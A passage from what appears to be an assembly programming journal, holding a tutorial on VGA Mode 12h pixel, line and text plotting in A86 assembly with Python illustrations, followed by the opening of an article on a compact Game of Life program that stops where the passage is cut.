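illustration, and it assumes the 80 bytes per scan line of Mode 012.

```python
BYTES_PER_ROW = 80          # 640 pixels / 8 pixels per byte (Mode 012)

def pix_addr(x, y):
    """Offset of the byte that holds pixel (x, y) within the VGA segment."""
    return y * BYTES_PER_ROW + x // 8

print(pix_addr(0, 0))       # first byte of video memory
print(pix_addr(639, 479))   # last byte of the visible screen
```

Pixels 0 to 7 of a row share one byte, so the division by 8 throws away the
position within the byte. That position is needed later for the plotting mask.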

The "Watte01" field is just a filler. Reserved by me.

Since the Mode 012 has 16 colours to spare we should also use them. Therefore
I set up space for 4 colours: Box-, Text-, Background- and Menu-colours.
Each printing routine will make sure the right colour is set.

It will be clear that each window is very flexible to use. If the position is
wrong, just change a few numbers. The same goes for colours that are not
optimal.
And by having several windows assigned to the same area on screen, you can
easily build special effects:

    fullscrn dw        0,    0,640,480, 0, 0, 0, 0, 4, mul_80, 0
             db       12, 14,    3, 15                ; main screen window

FullScrn just describes the complete screen. It is used for some very general
printing and plotting tasks. It starts at topleft (0,0) and is 640 wide and 480
high.

    ParWin2     dw        5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0
             db       10, 11,    3, 11                ; Parameter window

This is a window which is a subwindow of the Full Screen for storing data and
parameters.

    PlotWin     dw        5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0
             db        9, 15,    3,    7                ; Virtual plotting window

This is the Virtual Plotting Window. It has some text, plus the actual
plotting window:

    PlotWin2 dw        6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0
             db        9, 15,    3,    7                ; Actual plotting window

This is the place where the pixels live. It starts one pixel down/right of the
virtual window and also ends one pixel short of it.
The reason for making this "dummy" window structure was that this way there is
no need for an elaborate checking of extreme ends of the window while erasing
pixels. On the extremes of the "Virtual Plotting Window" there are the pixels
that make up a nice coloured box. It does not look nice when these lines are
erased. And the easiest way to prevent this was by defining two separate
windows: one for constructing the box and one for the actual work.

The 4 digit LED-style read-out is also controlled by four different windows.
Each digit has its own window definition:

    ------------ Digit Space ------------------------------- Start ---

    DigSpac1 dw       16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 14,    3           ; Digital display, digit 1, MSD
    DigSpac2 dw       56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 14,    3           ; Digital display, digit 2
    DigSpac3 dw       96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 12,    3           ; Digital display, digit 3
    DigSpac4 dw      136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 12,    3           ; Digital display, digit 4, LSD

    MSD = Most Significant Digit            LSD = Least Significant Digit

    ------------ Digit Space -------------------------------- End ----

This way it is convenient to align the digits on screen. As with normal
LED-style digits, the seven segments are drawn piece by piece, and erased
if necessary.

As you will know from voltmeters, the MSD is the least likely to change in
time and the LSD is most likely to be different between any two samples. So in
a way it is necessary to control erasing of just one digit without massive
software overheads. Therefore I again chose to use a separate window for each
digit. It makes erasing the digit easier and independent of the other three.

Something else to observe is that the two or three digits behind the decimal
point have a different colour from those before it. This way the user can easily
see the approximate magnitude of the number without having to search for a
decimal point. This is accomplished easily by having different BckCols in the
LSD windows.

This all costs a few bytes extra, but it saves a lot of coding.


How to quickly load a segment register.
---------------------------------------
Segment registers cannot be loaded with immediate data. So you normally load
the constant into a general register (or push it on the stack) and transfer
it to the actual segment register from there. This is not necessary. It can
be done much more easily by loading the segment register from memory:

    VGA_base dw       0A000        ; for ease of loading segment registers

And the corresponding code:

    mov        es, [VGA_base]

The detour via the stack or via AX takes more cycles and bytes.


Defining what to print.
-----------------------
In a graphics screen there are an awful lot of places where to store our
text. So we need a way to define where to put which tokens. For this I use the
following construct:

    -------------- Topic ----------------------------------- Start ---
    Topic MACRO                ; start of printing message
      dw   #1, #2
      db   #3, #4
      #EM

    TopicEnd MACRO            ; topics stop here
      dw   0F000
      #EM

             Topic 180, 9, 'Start : '
    ParaStrt db       'Manual     ', 0

             Topic    9, 28, 'Power : '
    ParaPowr db       'OFF', 0

             Topic 360, 55, 'Group : '
    ParaGrup db       '16 ', 0

             TopicEnd
    -------------- Topic ------------------------------------ End ----

The Topic Macro puts the first two arguments (the new values for CurrX and
CurrY) in the first two WORD positions of the definition table. The actual
text is then put in the BYTE positions. In most cases there will be no #4
argument, but A86 doesn't care about that.

Each "to-print" table is shut down by a TopicEnd Macro. It defines a new
CurrX of 0F000, or -4096. That clearly is out of range, so this is end of
table.
In normal operation, small negative values of CurrX and CurrY are accepted and
taken care of, although it can be dangerous to use this feature.
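
To make the table layout concrete, here is a minimal sketch in Python that
builds one entry the way the Topic macro and the following "db" line would,
and shows why 0F000 reads as -4096. The helper names topic and as_signed16
are invented for this illustration only.

```python
import struct

END_OF_TABLE = 0xF000       # the word emitted by TopicEnd

def topic(x, y, label, value):
    """One table entry: two little-endian words, then zero-terminated text."""
    text = (label + value).encode("ascii") + b"\x00"
    return struct.pack("<HH", x, y) + text

def as_signed16(word):
    """Interpret a 16-bit word as a signed value."""
    return word - 0x10000 if word & 0x8000 else word

table = topic(9, 28, "Power : ", "OFF") + struct.pack("<H", END_OF_TABLE)
print(table.hex(" "))
print(as_signed16(END_OF_TABLE))
```

The label and the parameter text simply follow each other in memory, so one
terminating zero ends both.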


Multiplying by 80.
------------------
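On CPU's from the 486 onwards, the MUL instruction is fast (though not single
cycle: a 16 bit MUL still takes over ten clocks on a 486). For all older
CPU's, the following code could mean some significant speed increases. Note
that the immediate shift counts need a 186 or better: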

    -------------------- Multiply ------------------------ Start ----
    mul_80:     push  bx                ; PixAddr in Mode 012
             shl   ax, 4
             mov   bx, ax            ; bx = 16 x SCR_Y
             shl   ax, 2            ; ax = 64 x SCR_Y
             add   ax, bx            ; ax = 80 x SCR_Y
             pop   bx
             ret
    -------------------- Multiply ------------------------- End -----

This routine is used over and over again, so a few microseconds more or less
will make a big difference.
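
The shift-and-add trick is easy to verify outside the assembler. The following
minimal sketch in Python mirrors the register steps of mul_80, with the masks
standing in for the 16 bit width of AX and BX. It is an illustration only, not
code from the package.

```python
def mul_80(y):
    """Shift-and-add version of y * 80, truncated to 16 bits like AX."""
    ax = (y << 4) & 0xFFFF      # ax = 16 * y
    bx = ax                     # bx = 16 * y
    ax = (ax << 2) & 0xFFFF     # ax = 64 * y
    return (ax + bx) & 0xFFFF   # ax = 80 * y

# every screen row of Mode 012 gives the same result as a plain multiply
assert all(mul_80(y) == y * 80 for y in range(480))
print(mul_80(479))
```

Since 479 * 80 is well below 65536, no row of the screen overflows a 16 bit
register.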


Where to leave our pixels?
--------------------------
Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the
very first byte of the VGA memory array. Its segment is 0A000 and its offset
is plain 0.
But not the full byte, since that would produce a line. No, we need to access
bit 4 of byte 0.

Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0.
Or, in index-language, CurrX = 0 addresses bit 7, and so on.

So we need to invert the screenposition into a bitposition. We'll come to that
later. Suppose, by some sheer magic, we succeeded in making that conversion,
we still need to tell the VGA which bit is involved. That's done by means of
the following routine:

    --------------------- SetMask ------------------------ Start -------
    SetMask: push  dx                ; ah = mask
             mov   dx, 03CE
             mov   al, 8
             out   dx, ax            ; set bit mask
             pop   dx
             ret
    --------------------- SetMask ------------------------- End --------

This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit
I/O instructions for adjacent I/O ports. The construct:

             mov   al, 8
             out   dx, ax            ; set bit mask

is identical to:

             mov   al, 8
             out   dx, al
             inc   dx
             mov   al, ah
             out   dx, al

Anyway, the plottingmask is defined to be as loaded in the AH register. We can
put any value in AH, not just one pixel, but also "no pixels" and "all
pixels".
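
What the 16 bit OUT does can be modelled in a few lines. This is a minimal
sketch in Python, for illustration only: out_word is a made-up name and the
function merely lists the byte writes instead of touching any hardware.

```python
def out_word(port, ax):
    """Model 'out dx, ax': AL goes to port, AH goes to port + 1."""
    al = ax & 0xFF
    ah = (ax >> 8) & 0xFF
    return [(port, al), (port + 1, ah)]

GC_INDEX = 0x3CE            # index port used by SetMask
BIT_MASK_REG = 8            # register number loaded into AL by SetMask

mask = 0x10                 # plot only bit 4 of the byte
writes = out_word(GC_INDEX, (mask << 8) | BIT_MASK_REG)
for port, value in writes:
    print(hex(port), hex(value))
```

The register number lands on the index port and the mask on the data port
right behind it, which is exactly the five-instruction sequence shown above.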


Defining colour in Mode 012.
----------------------------
Colours to use during plotting are defined in a comparable fashion:

    --------------------- Set Colour --------------------- Start -------
    SetColr: push  dx                ; ah = colour
             mov   dx, 03C4
             mov   al, 2
             out   dx, ax            ; select Map Mask register, set colour
             pop   dx
             ret
    --------------------- Set Colour ---------------------- End --------

In Mode 013 you can just load a bytevalue colour into a memory location and
that's it. So that's an ultrafast mode, but at the price of resolution.

In Mode 012 we define colour with a series of I/O instructions. Once a colour
is set, it remains active until changed by another SetColr call. Try to
remember this when all of a sudden all kinds of fancy colours start to appear
on screen....


Where to put the pixel?
-----------------------
I have presented the formula some paragraphs before this one. Basically we
work with virtual coordinates and must translate these to real coordinates
before trying to calculate an address. This is done by:

    ------------------ VGA memory address ---------------- Start -------
    VGaddr:                            ; calculate address in VGA memory
             mov   es, [VGA_base]    ; quickly load segment register
             mov   ax, [di.CurrY]    ; ax = current Y
             add   ax, [di.Win_Y]    ; adjust for window offset
             call  [di.Multiply]    ; multiply by bytes per row
             mov   bx, [di.CurrX]    ; bx = current X
             add   bx, [di.Win_X]    ; adjust for window offset
             shr   bx, 3            ; divide by 8
             add   bx, ax            ; bx = index address into video segment
             ret
    ------------------ VGA memory address ----------------- End --------

It's all fairly straightforward.
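
For readers who want to play with the numbers, here is a minimal sketch in
Python of the same calculation. The Window class is a cut-down stand-in for
the Infoblk1 structure (only the fields VGaddr uses), and the function field
plays the role of the "Multiply" pointer. All Python names are made up for
this illustration.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Window:
    win_x: int
    win_y: int
    curr_x: int
    curr_y: int
    multiply: Callable[[int], int]   # row number -> byte offset of that row

def mul_80(y):
    return y * 80                    # 80 bytes per row in Mode 012

def vga_addr(w):
    """Byte offset in video memory of the window's current position."""
    row_offset = w.multiply(w.curr_y + w.win_y)
    return row_offset + (w.curr_x + w.win_x) // 8

plot_win2 = Window(win_x=6, win_y=196, curr_x=0, curr_y=0, multiply=mul_80)
print(vga_addr(plot_win2))
```

Because the multiplier is looked up per window, moving to a mode with another
line length would only mean supplying another routine there.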


How do we plot pixels in Mode 012?
----------------------------------
This is a silly process. We cannot access all the 4 colour planes at once, so
we have used SetColr to define which colourplanes are to be affected. This all
is rather complicated. You may either take my word for it, or consult a 1200
page reference....

Now that we're ready to plot pixels, we do so by the following code:

    ------------------ VgaPlot -------------------- Start --------------
    VgaPlot: mov   al, [es:bx]        ;  Do the actual plotting
             mov   al, [ToPlot]
             mov   [es:bx], al
             ret
    ------------------ VgaPlot --------------------- End ---------------

The first line is a read command. It notifies the VGA controller about the
address of the pixelbyte, and makes it load its internal latches with the
current contents of that byte in all colour planes. The resulting data from
the read is of no concern. We immediately replace it with the value of
"ToPlot". For plotting there is a value of "FF" in this byte and for erasing
there is a "00" in it.

After this comes the actual plotting function. The write to the specified
address sets the pixels as defined by AL and SetMask. The bits outside the
mask keep the values that were latched by the read.
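
The interplay of the dummy read, the mask and the colour can be mimicked in a
small model. The sketch below is in Python and rests on an assumption: the VGA
is in the state the BIOS normally leaves it in after the mode set (plain
writes, no rotate, no set/reset). The function name write_byte and the list
layout are invented for this illustration.

```python
def write_byte(planes, latches, cpu_data, bit_mask, map_mask):
    """Model one byte write; planes holds one byte value per colour plane."""
    result = list(planes)
    for p in range(4):
        if map_mask & (1 << p):                     # plane enabled by SetColr
            kept = latches[p] & ~bit_mask & 0xFF    # bits outside the mask
            new = cpu_data & bit_mask               # bits inside the mask
            result[p] = kept | new
    return result

planes = [0b00001111, 0, 0, 0]      # one byte position, four planes
latches = list(planes)              # the dummy read fills the latches
after = write_byte(planes, latches, 0xFF, bit_mask=0x80, map_mask=0b0101)
print([format(b, "08b") for b in after])
```

Only planes 0 and 2 are touched (colour 5), and within them only bit 7
changes. Without the dummy read the latches would hold stale data and the
seven neighbouring pixels would be overwritten with it.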

Adding it all up gives the following code to really plot a pixel:

    -------- PlotPix ------------------------------- Start -----------
    PlotPix: push  ax, bx, cx, es    ; plot a point on screen
             call  VGaddr
             mov   cx, [di.CurrX]    ; calculate plottingmask
             add   cx, [di.Win_X]
             and   cx, 0111xB        ; cl = position in byte
             mov   ah, 080
             shr   ah, cl            ; now move the high bit backwards...
             call  SetMask            ; use it to set mask
             call  VgaPlot            ; and do the plotting
             pop   es, cx, bx, ax
             ret
    -------- PlotPix -------------------------------- End ------------

That's it to plot a pixel: just a few calls to some procedures we defined
earlier on. The majority of this procedure is comprised of the way to find the
actual bit-position in the VGA memory byte. Remember, to plot pixel 0 we need
bit 7!
Therefore we load CX with the current X value, correct this for the current
window position and isolate the lower 3 bits. These indicate the position of
the pixel in screenmemory.

             mov   cx, [di.CurrX]    ; calculate plottingmask
             add   cx, [di.Win_X]
             and   cx, 0111xB        ; cl = position in byte

At this point, CL contains the n-th bit in this byte. So I load AH with the
binary pattern 10000000 and shift it right until the corresponding bit
position is reached:

             mov   ah, 080
             shr   ah, cl            ; now move the high bit backwards...

I don't know if there are batches of Intel CPU's that have a problem with the
SHR instruction if CL equals zero, but I have not yet noticed any.
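
The conversion from screen position to bit position boils down to one shift.
A minimal sketch in Python (plot_mask is a name made up for this
illustration):

```python
def plot_mask(screen_x):
    """Bit mask for one pixel: pixel 0 of a byte is bit 7, pixel 7 is bit 0."""
    return 0x80 >> (screen_x & 7)

for x in (0, 3, 7, 8):
    print(x, format(plot_mask(x), "08b"))
```

Pixel 8 is the first pixel of the next byte, so its mask is the same as that
of pixel 0.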


Lines: series of pixels.
------------------------
There are three kinds of lines: horizontal, vertical and sloped ones. Vertical
lines are plotted pixel by pixel since all of them end up in different bytes
of VGA memory. Sloped lines are best taken care of by a Bresenham-style line
drawing algorithm (although the digital differential analyser is better).

Horizontal lines are a different kind of line. In these, several adjacent
pixels are plotted. And adjacent pixels are mostly in the same VGA memory
byte. Therefore I made two horizontal line drawers. The one for short lines
(less than 17 pixels) just plots the pixels one by one.
The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory
with as many full byte writes as possible.


Taking care of longer horizontal lines.
---------------------------------------
Suppose our line is composed as follows:

     First      1        2      3 ... K    Last      ; byte in video memory
    ......## ######## ######## ###...### ###.....    ; # = pixel to be set

So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it
lasts for N pixels and the last pixel to plot is pixel 2 (or bit 5).
We need some variables to calculate how to proceed with this in the shortest
possible time. This needs some calculations, so for short lines the math
overhead is more work than the actual plotting will take up.

     First      1        2      3 ... K    Last      ; byte in video memory
    ......## ######## ######## ###...### ###.....    ; # = pixel to be set

We first need to know the E-value which describes the number of pixels to plot
in the very first byte. The E-value is calculated as follows:

    E-val = 8 - ((CurrX + Win_X) AND 7)

Now we know the number of pixels to plot in the very first VGA memory
location. It would come in handy, however, to know which plotting mask
corresponds with it. That's why we use it to derive the E-mask:

   E-mask = FF shr ((8 - E-val) AND 7)

Next we need to know how many pixels there need to be plotted in the last
memory location. L-value and L-mask are determined as follows:

    L-val = (Total - E-val) AND 7
   L-mask = 080 sar (L-val - 1)        ; or 0 if L-val = 0

With the SAR we shift signbits to the right until the number of bits in the
mask corresponds with the number of pixels. Bit 7 itself already counts for
one pixel, hence the "- 1".

The last parameter we need to know is the actual speeding-up part: the full
bytes that can be plotted. The octet-part of the routine. We do this as
follows:

    K-val = (Total - E-val - L-val)/8

Now it also becomes clear why I kept the E-val and L-val parameters. They're
just needed for getting the right value for K-val.

There is, however one exceptional situation. Suppose the line we need to plot
is 26 pixels long, starting at pixel 6. This would produce the values:

  E-val = 2                                        E-mask = 00000011
  L-val = (26 - 2) AND 7 = 24 AND 7 = 0            L-mask = 00000000
  K-val = (26 - 2 - 0)/8 = 3

So, if the line ends on a byte boundary, we may NOT try to plot <A LOT> of
pixels past it (in a plotting loop that starts with CX = 0).
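
The whole bookkeeping fits in a few lines of a high level language. Below is
a minimal sketch in Python that reproduces the example. Python has no 8 bit
SAR, so the L-mask is built by shifting 0FF00 to the right instead, which
gives the same pattern. The name line_parts is made up for this illustration
and the sketch assumes that the line is at least E-val pixels long.

```python
def line_parts(start_x, total):
    """Split a horizontal line into first-byte, full-byte and last-byte parts."""
    first_bit = start_x & 7
    e_val = 8 - first_bit                    # pixels in the first byte
    e_mask = 0xFF >> first_bit
    l_val = (total - e_val) & 7              # pixels in the last byte
    l_mask = (0xFF00 >> l_val) & 0xFF        # l_val one-bits from bit 7 down
    k_val = (total - e_val - l_val) // 8     # full bytes in between
    return e_val, e_mask, l_val, l_mask, k_val

print(line_parts(6, 26))
```

For any line that is long enough, E-val + 8 * K-val + L-val adds up to the
total number of pixels again, which makes a handy sanity check.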

What the H_line procedure does is no more than what I described above. Here
comes the source:

    -------- H_Line -------------------------------- Start -----------
    L0:         mov   cx, [di.DeltaX]        ; do a short line
    L1:         call  PlotPix                ; by just repeating a single pixel-
             inc   [di.CurrX]            ; plot and update of CurrX
             loop  L1                    ; until done
             pop   es, cx, bx, ax
             ret

    H_Line:     push  ax, bx, cx, es        ; optimized horizontal line drawing
             cmp   [di.DeltaX], 17        ; too few pixels for a bulk draw?
             jb       L0
             mov   cx, [di.CurrX]        ; do a long line
             add   cx, [di.Win_X]        ; first get the E-value as described
             and   cx, 0111xB            ;    above
             mov   bx, 8
             sub   bx, cx
             mov   [E_val], bx            ; pixels to plot in leftmost byte
             mov   al, 0FF                ; now compose the mask to use there
             shr   al, cl
             mov   [E_mask], al            ; and store it in memory
             mov   cx, [di.DeltaX]        ; CX = length of line
             sub   cx, [E_val]            ; compensate for first-byte pixels
             mov   ax, cx
             and   ax, 0111xB            ; this many pixels in rightmost byte
             mov   [L_val], ax            ; and store it in memory
             sub   cx, ax                ; CX = number of pixels inbetween
             shr   cx, 3                ; divide by 8 pixels per byte
             mov   [K_val], cx            ; number of "full" bytes to plot
             clr   al                    ; AL := 0
             mov   cx, [L_val]            ; prepare to compose L-mask
             cmp   cx, 0                ; any bits in "last byte"
             IF ne mov    al, bit 7        ; if any bits, setup AL register
             dec   cx                    ; compensate for pixel 0, ...
             sar   al, cl                ; ... compose plotting mask and ...
             mov   [L_mask], al            ; ... store it into memory.
                                        ; that's it. Let's plot!
             call  VGaddr                ; load BX with address of byte in
                                        ; VGA memory
             mov   ah, [E_mask]
             call  SetMask                ; set plotting mask and ...
             call  VgaPlot                ; ... plot leftmost part
             inc   bx                    ; get adjacent address
             mov   cx, [K_val]            ; prepare for bulk-filling
             jcxz  >L4                    ; if nothing to do, jump out
             mov   ah, 0FF                ; else set ALL PIXELS mask
             call  SetMask
    L3:         call  VgaPlot                ; plot middle part
             inc   bx
             loop  L3                    ; until done
    L4:         mov   ah, [L_mask]
             call  SetMask
             call  VgaPlot                ; plot remaining pixels
             mov   ax, [di.DeltaX]
             add   [di.CurrX], ax        ; make sure CurrX is updated
             pop   es, cx, bx, ax        ; and git outa'here
             ret
    -------- H_Line --------------------------------- End ------------

The preparations are the bulk of the work, but after that is done, the line is
plotted with the lowest amount of I/O overhead.


Vertical lines.
---------------
Vertical lines are simply plotted by repeatedly calling PlotPix. It's so simple
that I neither need nor want to elaborate on it:

    -------- VertLin ------------------------------- Start -----------
    VertLin: push  cx                    ; draw a vertical line
             mov   cx, [di.DeltaY]
    L0:         call  PlotPix
             inc   [di.CurrY]            ; adjust Y coordinate
             loop  L0                    ; but not X value!
             pop   cx
             ret
    -------- VertLin -------------------------------- End ------------


What to do with linedrawing functions?
--------------------------------------
Now that we can draw lines, we can also draw boxes and window borders. This
all looks very professional and the overview of a program is enhanced
considerably. Try to figure out how to make the box-drawers by yourself.


Plotting text.
--------------
Now that we have windows that can be put at any plotting position, we also
need to be able to position text at any position. It doesn't look nice if
different windows force text to default to byte boundaries. And with the
experience we got from the H_line function, we are able to make a character
plotter that puts text on screen at ANY position.

I use a 9 x 16 character set. The ninth bit is just always blank, but it
enhances readability considerably. The characters in the bitmap are all 8
pixels wide and 16 pixels tall.

In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ %
of the cases this will not be so. Therefore I do the following:

 - do some positioning math first
 - repeat 16 times:
   - load the byte of the bitmap in AH
   - shift AX to the right the correct number of pixels
   - plot the AH part
 - if plotting on a byte boundary, we're done, else
   - repeat 16 times:
     - load the byte of the bitmap in AH
     - shift AX to the right the correct number of pixels
     - plot the AL part

Let's just have a look:

    -------- PutChar ------------------------------- Start -----------
    L0:         add   [di.CurrY], 16        ; process 'LF'
    L1:         pop   es, si, cx, bx
             ret

    L2:         mov   bx, [di.Indent]        ; process 'CR'
             mov   [di.CurrX], bx
             jmp   L1

    PutChar: push  bx, cx, si, es        ; print char in al at (x,y)
             cmp   al, lf
             je       L0
             cmp   al, cr
             je       L2

             mov   bx, [di.CurrX]
             add   bx, CHR_WID
             cmp   bx, [di.Win_wid]        ; still safe to print character?
             jbe   >L3                    ; if so, skip over this part
             mov   bx, [di.Indent]
             mov   [di.CurrX], bx        ; mimick 'CR'
             add   [di.CurrY], 16        ; mimick 'LF'

    L3:         mov   cx, [di.CurrX]
             add   cx, [di.Win_X]
             and   cx, 0111xB
             mov   [C_val], cl            ; store shiftcount for masks
             mov   bx, 0FF00
             shr   bx, cl                ; setup plotting mask and ...
             mov   [P_mask], bx            ;      ... store it
             clr   ah                    ; ax = ASCII code
             mov   si, ax                ; make address of pixels in bitmap
             shl   si, 4
             add   si, offset bitmap
             call  VGaddr                ; bx = -> in video memory
             mov   ax, [P_mask]            ; only the AH part is used ...
             call  SetMask                ; ... here.
             mov   cx, 16                ; 16 pixel lines per token
    L4:         push  cx                    ; we're in the loop now
             mov   ah, [si]                ; AH = pixelpattern
             clr   al                    ; AL = empty
             mov   cl, [C_val]            ; get shiftcount
             shr   ax, cl                ; distribute pixelBYTE across a WORD
             mov   cl, [es:bx]            ; dummy read, CL is expendable
             mov   [es:bx], ah            ; actual plotting of this half
             add   bx, 80                ; point to next pixelbyte address
             inc   si                    ; next pixeldata address
             pop   cx
             loop  L4                    ; and loop back

             sub   bx, 16 * 80 - 1        ; back to top row, next byte
             mov   ax, [P_mask]
             cmp   al, 0                ; if nothing to do, ...
             je       >L6                    ; ... skip this chapter
             mov   ah, al                ; else repeat the lot for the right-
             call  SetMask                ; most pixels....
             mov   cx, 16
             sub   si, cx                ; correct SI
    L5:         push  cx
             mov   ah, [si]
             clr   al
             mov   cl, [C_val]
             shr   ax, cl
             mov   cl, [es:bx]
             mov   [es:bx], al
             add   bx, 80
             inc   si
             pop   cx
             loop  L5
    L6:         add   [di.CurrX], CHR_WID    ; adjust CurrX value before ...
             jmp   L1                    ; ... getting a hike
    -------- PutChar -------------------------------- End ------------
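
The heart of PutChar is the way one bitmap byte is spread over two video
bytes. A minimal sketch in Python of that step and of the matching plotting
masks (the names split_row and masks are made up for this illustration):

```python
def split_row(pattern, shift):
    """Shift one bitmap row into a 16-bit word; return (left, right) bytes."""
    word = (pattern << 8) >> shift       # AH = pattern, AL = 0, shr ax, cl
    return (word >> 8) & 0xFF, word & 0xFF

def masks(shift):
    """Plotting masks for the two bytes, derived like P_mask (0FF00 shr cl)."""
    p_mask = 0xFF00 >> shift
    return (p_mask >> 8) & 0xFF, p_mask & 0xFF

left, right = split_row(0b11000011, 3)
print(format(left, "08b"), format(right, "08b"))
print([format(m, "08b") for m in masks(3)])
```

With a shift of zero the right-hand mask is empty, which is the byte boundary
case where the second pass is skipped.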

So far for plotting text. This routine will dump any character in any place of
the graphics screen. But it needs a CurrX and a CurrY value to know where to
plot things. This is both an advantage and a disadvantage. The advantage is
that we can plot ANYWHERE we like. The disadvantage is that we need to
elaborately specify CurrX and CurrY before the text is where we would like to
have it.

That's why I made the construct with the Topic and TopicEnd macros, as
described above.

Here comes the code for printing a table on screen. We spent a lot of time on
the preparations, and this is the stage where it is going to pay off. Look how
much code we need for printing neat sets of tokens and characters on screen.

    -------- Print --------------------------------- Start -----------
    print:     mov   ah, [di.TxtCol]        ; print a table of text
             call  SetColr
    L0:         lodsw                        ; get Xpos
             cmp   ax, 0F000            ; end of table?
             je       ret                    ; exit, if so
             mov   [di.CurrX], ax
             lodsw                        ; get Ypos
             mov   [di.CurrY], ax
    L1:         lodsb                        ; get text
             cmp   al, 0
             je       L0
             call  putchar                ; and print it
             jmp   L1                    ; until this line is done
    -------- Print ---------------------------------- End ------------

With this approach, and starting from a working (empty) framework of routines,
you can design the userinterface of your software within the hour. And it will
look just fine.
The actual code is then the only thing you need to worry about.....
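
To see the table walk in isolation, here is a minimal sketch in Python that
reads a table the way the Print loop does, but collects the entries in a list
instead of plotting them. The name walk_table and the sample table are made up
for this illustration.

```python
import struct

END_OF_TABLE = 0xF000

def walk_table(data):
    """Return a list of (x, y, text) entries, mimicking the Print loop."""
    entries, pos = [], 0
    while True:
        (x,) = struct.unpack_from("<H", data, pos)   # lodsw: get Xpos
        pos += 2
        if x == END_OF_TABLE:
            return entries
        (y,) = struct.unpack_from("<H", data, pos)   # lodsw: get Ypos
        pos += 2
        end = data.index(b"\x00", pos)               # lodsb until zero byte
        entries.append((x, y, data[pos:end].decode("ascii")))
        pos = end + 1

table = (struct.pack("<HH", 9, 28) + b"Power : OFF\x00"
         + struct.pack("<HH", 360, 55) + b"Group : 16 \x00"
         + struct.pack("<H", END_OF_TABLE))
print(walk_table(table))
```

A table without the closing 0F000 word would send the walker off into
whatever follows in memory, which is why the TopicEnd may never be forgotten.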

With such routines, tested and found reliable, you can make the user
interface easily and spend most of your time on the actual coding. If the
screen needs another layout (since you couldn't realize the function you
considered), just change a few entries in the table.
Many times just the X or Y values need some adjustment for better lining up,
or for regrouping. No need to worry about the order of the plotting. Just make
sure that the correct window is selected (for the colours) and that the table
is terminated by a TopicEnd.


Conclusion.
-----------
So far my elaboration on the VGA mode 12h. Again, I would rather use 800 x 600
but that mode is not standardised. VGA 12h is standard on all VGA cards, so
it's the best we can universally get and for many applications it is more than
enough.

Please try to make the BoxDrawing function. I will submit the "solution" to
the next issue. For future issues I will start working on an explanation about
mouse-usage. This little rodent is nice to control many applications. If the
screen is well laid out, you don't need the keyboard for data entry. Just drag
the mouse along the screen and poke him in the eye.


The bitmap data for the character generator can be obtained from
          http://asmjournal.freeservers.com/supplements/univ-vmode.html
where the complete text of the article has been archived.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                          Conway's Game of Life
                                                              by Laura Fairhead


    I had the idea for this one day after stumbling upon a "gem" that
somebody had written to play life. It was small and fast and reminded
me of years ago when I had written many versions of this for the
BBC Master 128 (my love lost). Since I had never written a version
for the PC I thought that I would, and ended up spending some hours
trimming off the bytes until it is now :- 156 bytes long. I must admit
if it was not for the program that I found, this program would have been
MUCH slower than it is. After I had written the code I tested it against
the program that I had found and to my perplexity it was a great deal
slower. After some hours of frustration I found the reason:- my program
was accessing the video memory to do the bulk of its work. This must have
brought about a factor of 12 decrease in speed!!

    Life is a classic cellular automaton game by John Conway. It is
played on an n x n grid of squares. Each square may be occupied by a
cell or empty. On each 'go' of the game the player calculates the next
generation of a colony of cells by applying three simple rules:-

(i)      a cell with fewer than 2 or more than 3 neighbours dies
(ii)     a cell with 2 or 3 neighbours survives
(iii)    a cell is born in an empty square with exactly 3 neighbours

    A neighbouring square is any square that is horizontally, vertically
or diagonally adjacent, so each square has 8 neighbouring squares.


Overview of the code
~~~~~~~~~~~~~~~~~~~~

First, note that if we define

        S:=state of square in this generation (0=empty, 1=occupied)
        N:=number of neighbours
       S':=state of square in the next generation

then according to the rules

        S'={0, if N<2 or N>3
           {1, if (N=2 or N=3) and S=1
           {1, if N=3

so S'=1 iff (N=2 and S=1) or N=3

this can be simplified using bitwise-OR to the dramatically simple:

            S'= ( (N|S)=3 )

(N|S equals 3 only when N=3, or when N=2 and S=1; no other N in 0..8
becomes 3 by setting bit0)
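
The equivalence can be checked exhaustively, since N only ranges over 0..8
and S over 0..1. The following is a small sketch in Python (not part of the
original program; the function names are made up for illustration) that
compares the three rules with the bitwise-OR shortcut:

```python
def next_state_rules(n, s):
    """Next state from the three rules as listed (s: 0=empty, 1=occupied)."""
    if n < 2 or n > 3:
        return 0                    # rule (i): dies, or square stays empty
    if s == 1:
        return 1                    # rule (ii): survives with 2 or 3 neighbours
    return 1 if n == 3 else 0       # rule (iii): birth needs exactly 3

def next_state_or(n, s):
    """Next state from the shortcut S' = ((N|S) = 3)."""
    return 1 if (n | s) == 3 else 0

# Compare both definitions for every neighbour count 0..8 and both states.
mismatches = [(n, s) for n in range(9) for s in (0, 1)
              if next_state_rules(n, s) != next_state_or(n, s)]
print(mismatches)
```

An empty list means the two definitions agree for every possible input.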

note: iff means "if and only if"

      "A iff B" means that A => B and B => A


    The code uses one big array, with one byte for each square, that
starts just after the end of the program. To save space it simply assumes
that it can use this memory, since this is generally okay. However this is
really very bad practice; it should use AH=04Ah/INT 021h to adjust
the memory size and abort if not successful.

    The big array actually serves the purpose of 2 arrays; bit0 of
a byte indicates the state of the square in the current generation. bit4
of each byte indicates the state of the square in the next generation.

    After initialisation, generation 0 is calculated by filling about
1/4 of the array with 1's.
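
    The listing gets its "about 1/4" from a three-instruction sequence
(CMP AL,0C0h / SBB AL,AL / INC AX) applied to a pseudo-random byte in AL.
The following Python sketch models just the low byte of that sequence; it
assumes the random byte is roughly uniformly distributed, which the article
does not claim, and the function name is made up for illustration:

```python
def seed_cell(al):
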